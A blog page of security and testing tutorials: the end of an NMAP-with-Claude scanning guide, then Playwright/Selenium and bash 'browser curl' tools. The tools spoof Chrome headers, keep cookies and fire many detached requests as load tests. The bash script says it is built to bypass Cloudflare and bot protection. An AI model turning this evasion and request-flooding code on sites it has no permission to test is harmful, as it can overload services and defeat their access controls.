Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

Additional Resources

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0

0
0

Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper but implemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
  const b = path.basename(process.argv[1]);
  console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
  -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
  -d, --data DATA            Request body
  -H, --header HEADER        Add custom header (repeatable)
  -o, --output FILE          Write response body to file
  -c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
  -A, --user-agent UA        Custom User-Agent
  -t, --timeout SECONDS      Request timeout [default: 30]
      --async                Run request(s) in background
      --count N              Number of async requests to fire [default: 1, requires --async]
      --no-redirect          Do not follow redirects (best-effort)
      --show-headers         Print response headers
      --json                 Send data as JSON (sets Content-Type)
      --form                 Send data as application/x-www-form-urlencoded
  -v, --verbose              Verbose output
  -h, --help                 Show this help message
EXAMPLES:
  ${b} https://example.com
  ${b} --async https://example.com
  ${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
  ${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
  const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
  for (let i = 0; i < argv.length; i++) {
    const a = argv[i];
    switch (a) {
      case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
      case '-d': case '--data': args.data = String(argv[++i] || ''); break;
      case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
      case '-o': case '--output': args.output = String(argv[++i] || ''); break;
      case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
      case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
      case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
      case '--async': args.async = true; break;
      case '--count': args.count = Number(argv[++i] || '1'); break;
      case '--no-redirect': args.followRedirects = false; break;
      case '--show-headers': args.showHeaders = true; break;
      case '--json': args.contentType = 'application/json'; break;
      case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
      case '-v': case '--verbose': args.verbose = true; break;
      case '-h': case '--help': usage(); process.exit(0);
      default:
        if (!args.url && !a.startsWith('-')) args.url = a; else {
          console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
          process.exit(1);
        }
    }
  }
  return args;
}
function parseHeaderList(list) {
  const out = {};
  for (const h of list) {
    const idx = h.indexOf(':');
    if (idx === -1) continue;
    const name = h.slice(0, idx).trim();
    const value = h.slice(idx + 1).trim();
    if (!name) continue;
    out[name] = value;
  }
  return out;
}
function buildDefaultHeaders(userAgent) {
  const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
  return {
    'User-Agent': ua,
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-User': '?1',
    'Cache-Control': 'max-age=0'
  };
}
async function performRequest(opts) {
  // Cookie file handling
  const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
  const cookieFile = opts.cookieFile || defaultCookie;
  // Launch Chromium
  const browser = await chromium.launch({ headless: true });
  const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
  if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
  const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
  // Load cookies if present
  if (fs.existsSync(cookieFile)) {
    try {
      const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
      if (ss.cookies?.length) await context.addCookies(ss.cookies);
    } catch {}
  }
  const request = context.request;
  // Build request options
  const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
  if (opts.data) {
    // Playwright will detect JSON strings vs form strings by headers
    reqOpts.data = opts.data;
  }
  if (opts.followRedirects === false) {
    // Best-effort: limit redirects to 0
    reqOpts.maxRedirects = 0;
  }
  const method = opts.method.toUpperCase();
  let resp;
  try {
    if (method === 'GET') resp = await request.get(opts.url, reqOpts);
    else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
    else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
    else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
    else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
    else {
      console.error(`${RED}Unsupported method: ${method}${NC}`);
      await browser.close();
      process.exit(2);
    }
  } catch (e) {
    console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
    await browser.close();
    process.exit(3);
  }
  // Persist cookies
  try {
    const state = await context.storageState();
    fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
  } catch {}
  // Output
  const status = resp.status();
  const statusText = resp.statusText();
  const headers = await resp.headers();
  const body = await resp.text();
  if (opts.verbose) {
    console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
    console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
  }
  if (opts.showHeaders) {
    // Print a simple status line and headers to stdout before body
    console.log(`HTTP ${status} ${statusText}`);
    for (const [k, v] of Object.entries(headers)) {
      console.log(`${k}: ${v}`);
    }
    console.log('');
  }
  if (opts.output) {
    fs.writeFileSync(opts.output, body);
  } else {
    process.stdout.write(body);
  }
  if (!resp.ok()) {
    console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
    await browser.close();
    process.exit(4);
  }
  await browser.close();
}
async function main() {
  const argv = process.argv.slice(2);
  const opts = parseArgs(argv);
  if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
  if ((opts.count || 1) > 1 && !opts.async) {
    console.error(`${RED}Error: --count requires --async${NC}`);
    process.exit(1);
  }
  if (opts.count < 1 || !Number.isInteger(opts.count)) {
    console.error(`${RED}Error: --count must be a positive integer${NC}`);
    process.exit(1);
  }
  if (opts.async) {
    // Fire-and-forget background processes
    const baseArgs = process.argv.slice(2).filter(a => a !== '--async' && !a.startsWith('--count'));
    const pids = [];
    for (let i = 0; i < opts.count; i++) {
      const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
      pids.push(child.pid);
      child.unref();
    }
    if (opts.verbose) {
      console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
    }
    if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
    else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
    process.exit(0);
  }
  await performRequest(opts);
}
main().catch(err => {
  console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
  process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH:

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
  -d "username=user&password=pass" \
  https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
  https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
  node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
  ((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=user&pass=pass" \
  "$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  "$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  --async --count 20 \
  "$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
  "https://example.com/"
  "https://example.com/"
  "https://example.com/"
)
for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
  sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
  if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/headers/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client; Selenium focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o','--output')
    p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('--show-headers', action='store_true')
    p.add_argument('-t','--timeout', type=int, default=30)
    p.add_argument('-A','--user-agent')
    p.add_argument('-v','--verbose', action='store_true')
    return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
        cookies = driver.get_cookies()
        json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
    except Exception:
        pass
    if args.output:
        open(args.output, 'w').write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.

Resources

0
0

Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash

# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false

# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

usage() {
    cat << EOH
Usage: $(basename "$0") [OPTIONS] URL

Advanced curl wrapper that mimics browser behavior to bypass bot protection.

OPTIONS:
    -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
    -d, --data DATA           POST/PUT data
    -H, --header HEADER       Add custom header (can be used multiple times)
    -o, --output FILE         Write output to file
    -c, --cookie FILE         Use custom cookie file [default: temp file]
    -A, --user-agent UA       Custom user agent [default: Chrome on macOS]
    -t, --timeout SECONDS     Request timeout [default: 30]
    --async                   Run request asynchronously in background
    --count N                 Number of async requests to fire [default: 1, requires --async]
    --no-redirect             Don't follow redirects
    --show-headers            Show response headers
    --json                    Send data as JSON (sets Content-Type)
    --form                    Send data as form-urlencoded
    -v, --verbose             Verbose output
    -h, --help                Show this help message

EXAMPLES:
    # Simple GET request
    $(basename "$0") https://example.com

    # Async GET request
    $(basename "$0") --async https://example.com

    # POST with JSON data
    $(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login

    # POST with form data
    $(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login

    # Multiple async requests (using loop)
    for i in {1..10}; do
        $(basename "$0") --async https://example.com/api/endpoint
    done

    # Multiple async requests (using --count)
    $(basename "$0") --async --count 10 https://example.com/api/endpoint

EOH
    exit 0
}

# Parse arguments
EXTRA_HEADERS=()
URL=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -X|--method)
            METHOD="$2"
            shift 2
            ;;
        -d|--data)
            DATA="$2"
            shift 2
            ;;
        -H|--header)
            EXTRA_HEADERS+=("$2")
            shift 2
            ;;
        -o|--output)
            OUTPUT_FILE="$2"
            shift 2
            ;;
        -c|--cookie)
            COOKIE_FILE="$2"
            shift 2
            ;;
        -A|--user-agent)
            USER_AGENT="$2"
            shift 2
            ;;
        -t|--timeout)
            TIMEOUT="$2"
            shift 2
            ;;
        --async)
            ASYNC=true
            shift
            ;;
        --count)
            COUNT="$2"
            shift 2
            ;;
        --no-redirect)
            FOLLOW_REDIRECTS=false
            shift
            ;;
        --show-headers)
            SHOW_HEADERS=true
            shift
            ;;
        --json)
            CONTENT_TYPE="application/json"
            shift
            ;;
        --form)
            CONTENT_TYPE="application/x-www-form-urlencoded"
            shift
            ;;
        -v|--verbose)
            VERBOSE=true
            shift
            ;;
        -h|--help)
            usage
            ;;
        *)
            if [[ -z "$URL" ]]; then
                URL="$1"
            else
                echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
                exit 1
            fi
            shift
            ;;
    esac
done

# Validate URL
if [[ -z "$URL" ]]; then
    echo -e "${RED}Error: URL is required${NC}" >&2
    usage
fi

# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
    echo -e "${RED}Error: --count requires --async${NC}" >&2
    exit 1
fi

if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
    echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
    exit 1
fi

# Execute curl
execute_curl() {
    # Build curl arguments as array instead of string
    local -a curl_args=()
    
    # Basic options
    curl_args+=("--compressed")
    curl_args+=("--max-time" "$TIMEOUT")
    curl_args+=("--connect-timeout" "10")
    curl_args+=("--http2")
    
    # Cookies (ensure file exists to avoid curl warning)
    : > "$COOKIE_FILE" 2>/dev/null || true
    curl_args+=("--cookie" "$COOKIE_FILE")
    curl_args+=("--cookie-jar" "$COOKIE_FILE")
    
    # Follow redirects
    if [[ "$FOLLOW_REDIRECTS" == true ]]; then
        curl_args+=("--location")
    fi
    
    # Show headers
    if [[ "$SHOW_HEADERS" == true ]]; then
        curl_args+=("--include")
    fi
    
    # Output file
    if [[ -n "$OUTPUT_FILE" ]]; then
        curl_args+=("--output" "$OUTPUT_FILE")
    fi
    
    # Verbose
    if [[ "$VERBOSE" == true ]]; then
        curl_args+=("--verbose")
    else
        curl_args+=("--silent" "--show-error")
    fi
    
    # Method
    curl_args+=("--request" "$METHOD")
    
    # Browser-like headers
    curl_args+=("--header" "User-Agent: $USER_AGENT")
    curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
    curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
    curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
    curl_args+=("--header" "Connection: keep-alive")
    curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
    curl_args+=("--header" "Sec-Fetch-Dest: document")
    curl_args+=("--header" "Sec-Fetch-Mode: navigate")
    curl_args+=("--header" "Sec-Fetch-Site: none")
    curl_args+=("--header" "Sec-Fetch-User: ?1")
    curl_args+=("--header" "Cache-Control: max-age=0")
    
    # Content-Type for POST/PUT
    if [[ -n "$DATA" ]]; then
        if [[ -n "$CONTENT_TYPE" ]]; then
            curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
        fi
        curl_args+=("--data" "$DATA")
    fi
    
    # Extra headers
    for header in "${EXTRA_HEADERS[@]}"; do
        curl_args+=("--header" "$header")
    done
    
    # URL
    curl_args+=("$URL")
    
    if [[ "$ASYNC" == true ]]; then
        # Run asynchronously in background
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        # Fire multiple requests if count > 1
        local pids=()
        for ((i=1; i<=COUNT; i++)); do
            # Run in background detached, suppress all output
            nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
            local pid=$!
            disown $pid
            pids+=("$pid")
        done
        
        if [[ "$COUNT" -eq 1 ]]; then
            echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
        else
            echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
        fi
    else
        # Run synchronously
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        curl "${curl_args[@]}"
        local exit_code=$?
        
        if [[ $exit_code -ne 0 ]]; then
            echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
            return $exit_code
        fi
    fi
}

# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
    if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
        rm -f "$COOKIE_FILE"
    fi
}

# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
    trap cleanup EXIT
fi

# Main execution
execute_curl

# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
    exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
  -d "username=user&password=pass" \
  https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"

# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://example.com/login

# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  https://example.com/dashboard

Load testing patterns

Simple load test with –count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
  ./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0

END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  ./browser_curl.sh --async "$URL" > /dev/null 2>&1
  ((COUNT++))
done

echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"

echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""

START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

OptionDescriptionDefault
-X, --methodHTTP method (GET/POST/PUT/DELETE)GET
-d, --dataRequest body (JSON or form)
-H, --headerAdd extra headers (repeatable)
-o, --outputWrite response to a filestdout
-c, --cookieCookie file to use (and persist)temp file
-A, --user-agentOverride User-AgentChrome/macOS
-t, --timeoutMax request time in seconds30
--asyncRun request(s) in the backgroundfalse
--count NFire N async requests (requires --async)1
--no-redirectDon’t follow redirectsfollows
--show-headersInclude response headersfalse
--jsonSets Content-Type: application/json
--formSets Content-Type: application/x-www-form-urlencoded
-v, --verboseVerbose diagnosticsfalse
-h, --helpShow usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior
  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

